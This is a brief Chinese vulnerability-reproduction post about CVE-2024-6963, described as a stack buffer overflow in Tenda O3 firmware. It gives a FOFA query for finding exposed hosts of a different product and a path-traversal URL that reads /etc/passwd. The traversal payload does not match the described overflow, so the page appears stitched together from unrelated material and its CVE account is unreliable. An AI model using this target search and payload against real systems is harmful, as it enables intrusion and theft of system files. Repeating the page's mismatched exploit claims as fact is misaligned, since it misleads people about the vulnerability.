CVE-2024-6963 admin 125445文章 98评论 2024年8月3日15:43:25评论21 views字数 294阅读0分58秒阅读模式 漏洞描述 在Tenda O3 1.0.0.10中发现了一个严重漏洞。该问题影响formexeccommand函数。对参数cdinput的操作会导致基于堆栈的缓冲区溢出。攻击可能是远程发起的。这个漏洞已经向公众披露,可能会被利用。标识符VDB-272117被分配给此漏洞。 资产测绘 FOFA:title="综合安防管理平台" 漏洞复现 http://127.0.0.1/api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd 原文始发于微信公众号(漏洞文库):【漏洞复现】CVE-2024-6963 点赞 https://cn-sec.com/archives/2984668.html 复制链接 复制链接 左青龙 微信扫一扫 右白虎 微信扫一扫
评论